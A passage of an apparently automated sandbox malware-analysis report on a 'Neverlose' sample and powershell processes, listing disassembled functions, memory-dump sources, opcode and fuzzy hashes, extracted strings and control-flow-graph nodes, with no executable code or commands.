                                                                • Instruction Fuzzy Hash: E2118830A85205DFDB14EB70D955B6E7BB2AF40315F20DA28D416DB2D1EFB19D06CB50
                                                                Function 02E70879 Relevance: .0, Instructions: 44COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 059cb6449476387df7ceb41179e5e86b33f786bbd46820a58f3f1cecade9aa90
                                                                • Instruction ID: 78ffe77e93a97f9e877cdeb0851fa3aca9d49f45495c47617de81948750cfa48
                                                                • Opcode Fuzzy Hash: 059cb6449476387df7ceb41179e5e86b33f786bbd46820a58f3f1cecade9aa90
                                                                • Instruction Fuzzy Hash: BE018430904249DFCB11DB74EA40A5EBFB2EF44300F2085F8C40897365DA395E49DB92
                                                                Function 02E7114B Relevance: .0, Instructions: 40COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a2bfd29842bc030a2fc77ab805c2b88c89dd5a5dafb79d785e1910c6de4671ab
                                                                • Instruction ID: 15b32f79ada330e528af193a461379e28b85093c5c5cf837deb931ea82300980
                                                                • Opcode Fuzzy Hash: a2bfd29842bc030a2fc77ab805c2b88c89dd5a5dafb79d785e1910c6de4671ab
                                                                • Instruction Fuzzy Hash: FFF0AC7288C3464EDB108774D8127EB7F348B42224F249566C0189E1C1EB74450AC771
                                                                Function 02E70888 Relevance: .0, Instructions: 36COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e55f2f2c71021f773ce17da140050aa9c2274e84621a18d2bbce99ada53cc531
                                                                • Instruction ID: 48de004aaef2ce79721bc8def67f2fa53428b3484533ad67bfc520ded778a892
                                                                • Opcode Fuzzy Hash: e55f2f2c71021f773ce17da140050aa9c2274e84621a18d2bbce99ada53cc531
                                                                • Instruction Fuzzy Hash: 2D01F430904209DFCB14DF78EA40A5EBFB6EB84700F2085B8D40857365DB365E49DBD1
                                                                Function 02E70838 Relevance: .0, Instructions: 19COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e20ca01df2e2946601dfba4fadb6962e522f1d2b842bff0a907fb4041b50a895
                                                                • Instruction ID: 8c4532eeb71c15568cd970ff04a4c8f9b984e03f29f9ce72e0d955df8183f6ce
                                                                • Opcode Fuzzy Hash: e20ca01df2e2946601dfba4fadb6962e522f1d2b842bff0a907fb4041b50a895
                                                                • Instruction Fuzzy Hash: F8D02B20B4530947EF2923B4940872C3A8C9F80729F010726A11AD11D1DF38E4104192
                                                                Function 02E70F49 Relevance: .0, Instructions: 19COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 20adb60992ae6f5fffe9b8cb652ff1a918784ba2f4da8f8fc40597f69c27aa9f
                                                                • Instruction ID: 869705204e4234c936ebfbac978d6fb308f6af43316a791b27abb7b75ca81fa5
                                                                • Opcode Fuzzy Hash: 20adb60992ae6f5fffe9b8cb652ff1a918784ba2f4da8f8fc40597f69c27aa9f
                                                                • Instruction Fuzzy Hash: 5FE086309C520ACBEB14AF70D5197AF7A61AF40314F20DB25D416ED2D0EFB08A06CE61
                                                                Function 02E710E9 Relevance: .0, Instructions: 18COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fd4625c08060588d5934cd51bed891dff5ea2fbf329ca82db7bd53ec3d7d0a6e
                                                                • Instruction ID: 952dd3b4652609933d96beaee7853101452ee872cec7a97ba8773484b3820430
                                                                • Opcode Fuzzy Hash: fd4625c08060588d5934cd51bed891dff5ea2fbf329ca82db7bd53ec3d7d0a6e
                                                                • Instruction Fuzzy Hash: 55E086309C120A8BEB14AF70D5197AF7A61AF40314F209B24D416D91D0EFB08A06CE50
                                                                Function 02E73FF8 Relevance: .0, Instructions: 18COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 56c5db9e0ac5a7d32d67fee71e7c04ae38bc41baa78cc7ffb4f4b57e8ccbf540
                                                                • Instruction ID: 4df831eda1438c716c3b4b1171da21e6ba6e70ff5090ee7327e77975754e18e8
                                                                • Opcode Fuzzy Hash: 56c5db9e0ac5a7d32d67fee71e7c04ae38bc41baa78cc7ffb4f4b57e8ccbf540
                                                                • Instruction Fuzzy Hash: E1D02BB28486801ECB229330EC957D87F16DF81214F25C270E84146167CA7D898E8B80
                                                                Function 02E70848 Relevance: .0, Instructions: 14COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c49f9daff1952bb0acea8d7ac1fca843784a0dbf052053e6967e9b356eec121b
                                                                • Instruction ID: edcef2fc62b845ec32c3ae0fbce20dd80123aacce6aa3567271ea34fbdc60667
                                                                • Opcode Fuzzy Hash: c49f9daff1952bb0acea8d7ac1fca843784a0dbf052053e6967e9b356eec121b
                                                                • Instruction Fuzzy Hash: DBC01231B8030A87EF3C67F5E01C76D3A9D5FC0919B011929E24BD1141EF38E52045E2
                                                                Function 02E74008 Relevance: .0, Instructions: 12COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1729983227.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e70000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 61c8b0a64fd98cb2f3d140d9903fc4aab474f565e27651c98e1e38c9dd25cb10
                                                                • Instruction ID: 6c1b7dbe61f3110f4bd309c3ddc5c3c6dc9f0d1d7d83af6c133aa0eaafd9e184
                                                                • Opcode Fuzzy Hash: 61c8b0a64fd98cb2f3d140d9903fc4aab474f565e27651c98e1e38c9dd25cb10
                                                                • Instruction Fuzzy Hash: BAC012704482495ECA21E775F9449957B5EEBC02047509630E40506229DF7D9DCD4694

                                                                Non-executed Functions

                                                                Function 010232A6 Relevance: .5, Instructions: 477COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1727100048.0000000001008000.00000040.00000001.01000000.00000003.sdmp, Offset: 01008000, based on PE: true
                                                                • Associated: 00000000.00000002.1727100048.0000000001149000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1727100048.000000000114E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1727100048.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_ff0000_Neverlose.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c47ce1ddd9cb1132b0afcd45080238c39c69e70dd9b226b0964dcbea2758502b
                                                                • Instruction ID: 73574f7ffa625c95c0251173173dc9f1a6719fc18ea652f1802ea11f7ec39a43
                                                                • Opcode Fuzzy Hash: c47ce1ddd9cb1132b0afcd45080238c39c69e70dd9b226b0964dcbea2758502b
                                                                • Instruction Fuzzy Hash: 3DE1E6B680D7E05FD7534B78C8621957FB4BF2B32871985DAC5C48E263F22A9907C782

                                                                Execution Graph

                                                                Execution Coverage:6.2%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:3
                                                                Total number of Limit Nodes:0
                                                                execution_graph 22068 8f96428 22069 8f9646b SetThreadToken 22068->22069 22070 8f96499 22069->22070

                                                                Executed Functions

                                                                Function 04F6B470 Relevance: .3, Instructions: 266COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 758 4f6b470-4f6b4a9 760 4f6b4ae-4f6b7e9 call 4f6acbc 758->760 761 4f6b4ab 758->761 822 4f6b7ee-4f6b7f5 760->822 761->760
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4fe08af2841c832a680302505b5d9f0bbcdc7ea61a1948b9bd3b05a60991857f
                                                                • Instruction ID: 6c0c216ea64c5413b4ebcfd78a3e80a7df036fe552df9ddc407a86bab17cd94b
                                                                • Opcode Fuzzy Hash: 4fe08af2841c832a680302505b5d9f0bbcdc7ea61a1948b9bd3b05a60991857f
                                                                • Instruction Fuzzy Hash: 7C9173B1B007185BDB1AEFB4C4146AEB7E2EF84604B10892DD54AAF344DF74AD068BD6
                                                                Function 04F6B490 Relevance: .3, Instructions: 252COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 823 4f6b490-4f6b4a9 824 4f6b4ae-4f6b7e9 call 4f6acbc 823->824 825 4f6b4ab 823->825 886 4f6b7ee-4f6b7f5 824->886 825->824
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 60f8483d28c411df96450d5a08deb18580d3a10d8f37094e5aeaa0dd718dad56
                                                                • Instruction ID: 399f1a5809d445dd733de005aaec4747091bf09014c840fdcc689035e7e5db28
                                                                • Opcode Fuzzy Hash: 60f8483d28c411df96450d5a08deb18580d3a10d8f37094e5aeaa0dd718dad56
                                                                • Instruction Fuzzy Hash: 97916FB1F007185BDB1AEBB4C4146AEB7E2EF84604B10892DD54AAB344DF74AD068BD6
                                                                Function 07E22308 Relevance: 13.1, Strings: 10, Instructions: 639COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1716831750.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_7e20000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'^q$4'^q$JGl$JGl$JGl$JGl$JGl$JGl$rFl$rFl
                                                                • API String ID: 0-3436028847
                                                                • Opcode ID: fdbc1523c6df33fdcaed856cc94ec030f730740c0a0f5ce39096b7ef4c9dde04
                                                                • Instruction ID: 797fea7340e1629d8dfc20fa845857c1564752eb657ba318cbd1dcc0194e1f55
                                                                • Opcode Fuzzy Hash: fdbc1523c6df33fdcaed856cc94ec030f730740c0a0f5ce39096b7ef4c9dde04
                                                                • Instruction Fuzzy Hash: 01226DB1B0522ADFCB14DB789401BAABBE9BF85310F15907AD605CF251DB31CC86D7A1
                                                                Function 04F6EB70 Relevance: 8.9, Strings: 7, Instructions: 198COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 206 4f6eb70-4f6eb83 208 4f6eb85-4f6eb9e call 4f6eac8 206->208 209 4f6eba3-4f6ebb6 206->209 218 4f6ed34-4f6ed37 208->218 215 4f6ebf4-4f6ebfd 209->215 216 4f6ebb8-4f6ebd0 209->216 221 4f6ec06-4f6ec12 215->221 222 4f6ebff-4f6ec01 215->222 216->215 225 4f6ebd2-4f6ebe0 216->225 226 4f6ec14-4f6ec16 221->226 227 4f6ec1b-4f6ec27 221->227 222->218 230 4f6ebe6-4f6ebef 225->230 231 4f6ed38-4f6ed73 225->231 226->218 232 4f6ec30-4f6ec45 227->232 233 4f6ec29-4f6ec2b 227->233 230->218 239 4f6ed75-4f6eda0 231->239 240 4f6eda1-4f6eda9 231->240 241 4f6ec47-4f6ec49 232->241 242 4f6ec4e-4f6ec65 232->242 233->218 243 4f6edae-4f6edc5 240->243 241->218 250 4f6ec76-4f6ec82 242->250 251 4f6ec67-4f6ec71 242->251 255 4f6ec84-4f6ec8e 250->255 256 4f6ec93-4f6ec9f 250->256 251->218 255->218 259 4f6ecb0-4f6ecbc 256->259 260 4f6eca1-4f6ecab 256->260 263 4f6ecbe-4f6ecc8 259->263 264 4f6ecca-4f6ecd6 259->264 260->218 263->218 267 4f6ece4-4f6ecf0 264->267 268 4f6ecd8-4f6ece2 264->268 271 4f6ecf2-4f6ecfc 267->271 272 4f6ecfe-4f6ed0a 267->272 268->218 271->218 275 4f6ed0c-4f6ed16 272->275 276 4f6ed18-4f6ed24 272->276 275->218 279 4f6ed26-4f6ed30 276->279 280 4f6ed32 276->280 279->218 280->218
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ,bq$$^q$$^q$$^q$$^q$$^q$$^q
                                                                • API String ID: 0-13851718
                                                                • Opcode ID: 34fc4e00f4b07573a9d81876912a6af9ce763a597d8137700e240c11bc318c2b
                                                                • Instruction ID: 5fb613aeab30e0729f8ad96e940582a1d6505a2dc468767714f50205dcea7612
                                                                • Opcode Fuzzy Hash: 34fc4e00f4b07573a9d81876912a6af9ce763a597d8137700e240c11bc318c2b
                                                                • Instruction Fuzzy Hash: C861823A7841548FCB29DB79C55482D7BE2AF8971031048ADD047CF3A5EE2AEC43CB62
                                                                Function 07E23CE8 Relevance: 5.6, Strings: 4, Instructions: 587COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 282 7e23ce8-7e23d0d 283 7e23d13-7e23d18 282->283 284 7e23f00-7e23f16 282->284 285 7e23d30-7e23d34 283->285 286 7e23d1a-7e23d20 283->286 292 7e23f18-7e23f1d 284->292 293 7e23f1f-7e23f4a 284->293 290 7e23eb0-7e23eba 285->290 291 7e23d3a-7e23d3c 285->291 288 7e23d22 286->288 289 7e23d24-7e23d2e 286->289 288->285 289->285 294 7e23ec8-7e23ece 290->294 295 7e23ebc-7e23ec5 290->295 296 7e23d3e-7e23d4a 291->296 297 7e23d4c 291->297 292->293 298 7e23f50-7e23f55 293->298 299 7e240ce-7e240de 293->299 300 7e23ed0-7e23ed2 294->300 301 7e23ed4-7e23ee0 294->301 303 7e23d4e-7e23d50 296->303 297->303 304 7e23f57-7e23f5d 298->304 305 7e23f6d-7e23f71 298->305 315 7e240e0-7e240e5 299->315 316 7e240e7-7e24112 299->316 306 7e23ee2-7e23efd 300->306 301->306 303->290 307 7e23d56-7e23d75 303->307 308 7e23f61-7e23f6b 304->308 309 7e23f5f 304->309 312 7e24080-7e2408a 305->312 313 7e23f77-7e23f79 305->313 337 7e23d77-7e23d83 307->337 338 7e23d85 307->338 308->305 309->305 317 7e24097-7e2409d 312->317 318 7e2408c-7e24094 312->318 319 7e23f7b-7e23f87 313->319 320 7e23f89 313->320 315->316 326 7e24228-7e2425d 316->326 327 7e24118-7e2411d 316->327 323 7e240a3-7e240af 317->323 324 7e2409f-7e240a1 317->324 322 7e23f8b-7e23f8d 319->322 320->322 322->312 331 7e23f93-7e23fb2 322->331 332 7e240b1-7e240cb 323->332 324->332 347 7e2428b-7e24295 326->347 348 7e2425f-7e24281 326->348 328 7e24135-7e24139 327->328 329 7e2411f-7e24125 327->329 339 7e241da-7e241e4 328->339 340 7e2413f-7e24141 328->340 334 7e24127 329->334 335 7e24129-7e24133 329->335 367 7e23fc2 331->367 368 7e23fb4-7e23fc0 331->368 334->328 335->328 343 7e23d87-7e23d89 337->343 338->343 349 7e241f1-7e241f7 339->349 350 7e241e6-7e241ee 339->350 344 7e24143-7e2414f 340->344 345 7e24151 340->345 343->290 352 7e23d8f-7e23d96 343->352 353 7e24153-7e24155 344->353 345->353 356 7e24297-7e2429c 347->356 357 7e2429f-7e242a5 347->357 390 7e24283-7e24288 348->390 391 7e242d5-7e242fe 348->391 354 7e241f9-7e241fb 349->354 355 7e241fd-7e24209 349->355 352->284 361 7e23d9c-7e23da1 352->361 353->339 364 7e2415b-7e2415d 353->364 365 7e2420b-7e24225 354->365 355->365 358 7e242a7-7e242a9 357->358 359 7e242ab-7e242b7 357->359 366 7e242b9-7e242d2 358->366 359->366 369 7e23da3-7e23da9 361->369 370 7e23db9-7e23dc8 361->370 371 7e24177-7e2417e 364->371 372 7e2415f-7e24165 364->372 378 7e23fc4-7e23fc6 367->378 368->378 379 7e23dab 369->379 380 7e23dad-7e23db7 369->380 370->290 392 7e23dce-7e23dec 370->392 375 7e24180-7e24186 371->375 376 7e24196-7e241d7 371->376 382 7e24167 372->382 383 7e24169-7e24175 372->383 385 7e2418a-7e24194 375->385 386 7e24188 375->386 378->312 389 7e23fcc-7e24003 378->389 379->370 380->370 382->371 383->371 385->376 386->376 409 7e24005-7e2400b 389->409 410 7e2401d-7e24024 389->410 404 7e24300-7e24326 391->404 405 7e2432d-7e2433e 391->405 392->290 407 7e23df2-7e23e17 392->407 404->405 416 7e24340-7e24346 405->416 417 7e24347-7e24348 405->417 407->290 432 7e23e1d-7e23e24 407->432 412 7e2400f-7e2401b 409->412 413 7e2400d 409->413 414 7e24026-7e2402c 410->414 415 7e2403c-7e2407d 410->415 412->410 413->410 420 7e24030-7e2403a 414->420 421 7e2402e 414->421 416->417 422 7e24382-7e2438f 417->422 423 7e2434a-7e2435c 417->423 420->415 421->415 426 7e24395-7e2439f 422->426 423->426 427 7e2435e-7e2437b 423->427 429 7e243a1-7e243a5 426->429 430 7e243a8-7e243ae 426->430 439 7e243e5-7e243ea 427->439 440 7e2437d-7e24380 427->440 433 7e243b0-7e243b2 430->433 434 7e243b4-7e243c0 430->434 436 7e23e26-7e23e41 432->436 437 7e23e6a-7e23e9d 432->437 438 7e243c2-7e243e2 433->438 434->438 446 7e23e43-7e23e49 436->446 447 7e23e5b-7e23e5f 436->447 454 7e23ea4-7e23ead 437->454 439->440 440->422 448 7e23e4b 446->448 449 7e23e4d-7e23e59 446->449 451 7e23e66-7e23e68 447->451 448->447 449->447 451->454
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1716831750.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_7e20000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                • API String ID: 0-1420252700
                                                                • Opcode ID: 873d7b2def7bbc1098f7d4fea0e01bd5cff91abd4e800d0ff5fe3daa7d8eb763
                                                                • Instruction ID: 5b47df806bb81a3e597bb5694a9f48be5225a5d551af55f9c1273dd645eddd87
                                                                • Opcode Fuzzy Hash: 873d7b2def7bbc1098f7d4fea0e01bd5cff91abd4e800d0ff5fe3daa7d8eb763
                                                                • Instruction Fuzzy Hash: 85129BB1B053A58FCB158B699811EAABFA2AFC2314F14907BD401CF691DB31DCC6C7A1
                                                                Function 08F96420 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 459 8f96420-8f96463 461 8f9646b-8f96497 SetThreadToken 459->461 462 8f96499-8f9649f 461->462 463 8f964a0-8f964bd 461->463 462->463
                                                                APIs
                                                                • SetThreadToken.KERNELBASE(?,F2DC07CD), ref: 08F9648A
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1718720173.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_8f90000_powershell.jbxd
                                                                Similarity
                                                                • API ID: ThreadToken
                                                                • String ID:
                                                                • API String ID: 3254676861-0
                                                                • Opcode ID: ab0a7b43f70af7fbb074d317526cafaa16826c0ea018d16b6f82d9b6dc2f4f61
                                                                • Instruction ID: bef4048a62be6b7c93183304d21ac3194eaf8dff906860bc978d182252e07ba5
                                                                • Opcode Fuzzy Hash: ab0a7b43f70af7fbb074d317526cafaa16826c0ea018d16b6f82d9b6dc2f4f61
                                                                • Instruction Fuzzy Hash: 7D1116B59003088FDB10DFAAD544BDEFBF4AF48324F248419D458A7710C775A944CFA5
                                                                Function 08F96428 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 466 8f96428-8f96497 SetThreadToken 468 8f96499-8f9649f 466->468 469 8f964a0-8f964bd 466->469 468->469
                                                                APIs
                                                                • SetThreadToken.KERNELBASE(?,F2DC07CD), ref: 08F9648A
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1718720173.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_8f90000_powershell.jbxd
                                                                Similarity
                                                                • API ID: ThreadToken
                                                                • String ID:
                                                                • API String ID: 3254676861-0
                                                                • Opcode ID: 267a8fd57efdf1ea7b0c7bcb3cdb0edd958549be1d66cda88589cabd4cc14574
                                                                • Instruction ID: 78482059f8d20c6f5d45654a4646772e2860fb012acf4a173c291f67d781c96f
                                                                • Opcode Fuzzy Hash: 267a8fd57efdf1ea7b0c7bcb3cdb0edd958549be1d66cda88589cabd4cc14574
                                                                • Instruction Fuzzy Hash: 3411F5B59003488FDB10DF9AC544B9EFBF8EB48324F248419D458A7310D779A944CFA5
                                                                Function 04F66FE0 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 472 4f66fe0-4f66fff 473 4f67105-4f67143 472->473 474 4f67005-4f67008 472->474 501 4f6700a call 4f67697 474->501 502 4f6700a call 4f6767c 474->502 476 4f67010-4f67022 477 4f67024 476->477 478 4f6702e-4f67043 476->478 477->478 484 4f670ce-4f670e7 478->484 485 4f67049-4f67059 478->485 490 4f670f2 484->490 491 4f670e9 484->491 486 4f67065-4f67073 call 4f6bf10 485->486 487 4f6705b 485->487 493 4f67079-4f6707d 486->493 487->486 490->473 491->490 494 4f6707f-4f6708f 493->494 495 4f670bd-4f670c8 493->495 496 4f67091-4f670a9 494->496 497 4f670ab-4f670b5 494->497 495->484 495->485 496->495 497->495 501->476 502->476
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (bq
                                                                • API String ID: 0-149360118
                                                                • Opcode ID: 750c3f208c8abc1634d6be424916eebd273c02b9e983e972459d16747127b468
                                                                • Instruction ID: 63f2b740e792dc56cf9544d228deec93ea4636ea5ebc243c4f0c235fcb55562c
                                                                • Opcode Fuzzy Hash: 750c3f208c8abc1634d6be424916eebd273c02b9e983e972459d16747127b468
                                                                • Instruction Fuzzy Hash: EC415134B042049FDB04EFA8C454AAEBBF1EF8D715F244459E402AB395DB36EC02CB60
                                                                Function 04F6E580 Relevance: 1.4, Strings: 1, Instructions: 100COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 503 4f6e580-4f6e61e 511 4f6e624-4f6e63b 503->511 512 4f6e6a2-4f6e6bb 503->512 517 4f6e643-4f6e6a0 511->517 515 4f6e6c6 512->515 516 4f6e6bd 512->516 518 4f6e6c7 515->518 516->515 517->511 517->512 518->518
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: JGl
                                                                • API String ID: 0-2909732305
                                                                • Opcode ID: 8cb378f3f57730ed4e77e6118b29d9e6fbf05ceab0837a2e7b0af74c00b36957
                                                                • Instruction ID: 543ffcee00b367b5ee2f42295cd0ee4c9b02f636283d344ba383e4b6baf7aebe
                                                                • Opcode Fuzzy Hash: 8cb378f3f57730ed4e77e6118b29d9e6fbf05ceab0837a2e7b0af74c00b36957
                                                                • Instruction Fuzzy Hash: A741DD75A003099FCB11DF78D954A9DBBF1FF49304F1086A9D406AB3A5CB31AC0ACBA1
                                                                Function 04F6E5A8 Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 526 4f6e5a8-4f6e61e 533 4f6e624-4f6e63b 526->533 534 4f6e6a2-4f6e6bb 526->534 539 4f6e643-4f6e6a0 533->539 537 4f6e6c6 534->537 538 4f6e6bd 534->538 540 4f6e6c7 537->540 538->537 539->533 539->534 540->540
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: JGl
                                                                • API String ID: 0-2909732305
                                                                • Opcode ID: 03d915ad31610f3e20535cee1d8f76731164a2efa55151b9e3ea9886377c3eb0
                                                                • Instruction ID: 3cb430c33ea4d0877ec5b8942018db3da1981c49915ad713d141bebd711435b6
                                                                • Opcode Fuzzy Hash: 03d915ad31610f3e20535cee1d8f76731164a2efa55151b9e3ea9886377c3eb0
                                                                • Instruction Fuzzy Hash: 3A315C75A00205DFCB14DF69D654A9EBBF2FF88304F108669D406A7394DB31BD45CBA0
                                                                Function 04F6AF98 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 548 4f6af98-4f6afa1 call 4f6a984 550 4f6afa6-4f6afaa 548->550 551 4f6afac-4f6afb9 550->551 552 4f6afba-4f6b055 550->552 558 4f6b057-4f6b05d 552->558 559 4f6b05e-4f6b07b 552->559 558->559
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1704953015.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4f60000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (&^q
                                                                • API String ID: 0-2067289071
